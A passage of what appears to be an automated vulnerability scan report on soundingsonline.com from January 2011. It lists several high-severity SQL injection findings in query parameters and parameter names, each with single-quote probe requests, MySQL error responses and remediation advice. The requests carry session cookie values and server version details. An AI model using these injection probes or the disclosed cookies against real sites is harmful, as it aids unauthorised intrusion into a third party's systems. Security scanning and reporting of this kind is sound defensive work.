<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.84. http://www.soundingsonline.com/features/lifestyle [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/features/lifestyle
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /features/lifestyle?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:48 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /features/lifestyle?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:50 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.85. http://www.soundingsonline.com/features/profiles [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/features/profiles
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /features/profiles?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:46 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /features/profiles?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:48 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.86. http://www.soundingsonline.com/features/technical [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/features/technical
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /features/technical?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:07 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /features/technical?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:09 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.87. http://www.soundingsonline.com/features/type-of-boat [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/features/type-of-boat
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /features/type-of-boat?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:48 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /features/type-of-boat?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:51 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The Itemid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Itemid parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111' HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:16 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111'' AND ' at line 1</font> ...[SNIP]...
Request 2
GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111'' HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:17 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The chronoformname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the chronoformname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /index.php?option=com_chronocontact&chronoformname=CGPage' HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:25 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/index.php?option=com_chronocontact&chronoformname=CGPage'' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /index.php?option=com_chronocontact&chronoformname=CGPage'' HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:26 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /index.php?option=com_content&view=category&layout=blog&id=98'&Itemid=111 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:14 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /index.php?option=com_content&view=category&layout=blog&id=98''&Itemid=111 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:15 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The layout parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the layout parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /index.php?option=com_content&view=category&layout=blog'&id=98&Itemid=111 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:12 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /index.php?option=com_content&view=category&layout=blog''&id=98&Itemid=111 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:13 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.92. http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /index.php?option=com_chronocontact&chronoformname=CGPage&1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:33 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /index.php?option=com_chronocontact&chronoformname=CGPage&1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:34 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The option parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the option parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /index.php?option=com_chronocontact'&chronoformname=CGPage HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:24 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
